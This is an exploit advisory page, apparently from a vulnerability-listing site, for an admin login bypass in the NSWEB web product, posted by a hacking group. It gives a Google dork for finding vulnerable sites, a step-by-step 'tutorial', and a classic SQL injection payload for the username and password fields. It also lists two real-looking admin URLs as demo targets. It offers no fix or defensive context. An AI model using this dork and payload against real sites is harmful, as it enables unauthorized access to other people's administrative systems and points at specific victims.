NSWEB Admin Login Bypass

2017.07.26

Turkz.org (TR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: NSWEB Admin Login Bypass
# Author : Sipahiler / TurkZ.org
# Date : 2017-07-26
# Google Dork : intext: NSWEB © Copyright 2017. All Rights Reserved
# Tested on : Kali Linux And W7
# Vendor Home : http://www.nsweb.rs/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
Tutorial :
[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: 'or' '='
[+] Password: 'or' '='
Demo :
http://www.nsweb.rs/admin
http://www.nskoncept.rs/admin/
Greet'Zzz : Darkcod3r & EfendiBey & Atabey & TrazeR & Zer0day & AKA_1NF4z & Kutluhan & Alianz & Empire_Fatih & S1R

References:

http://www.trazer.org/

http://www.turkz.org/Forum/

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

NSWEB Admin Login Bypass

Dork: intext: NSWEB © Copyright 2017. All Rights Reserved

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.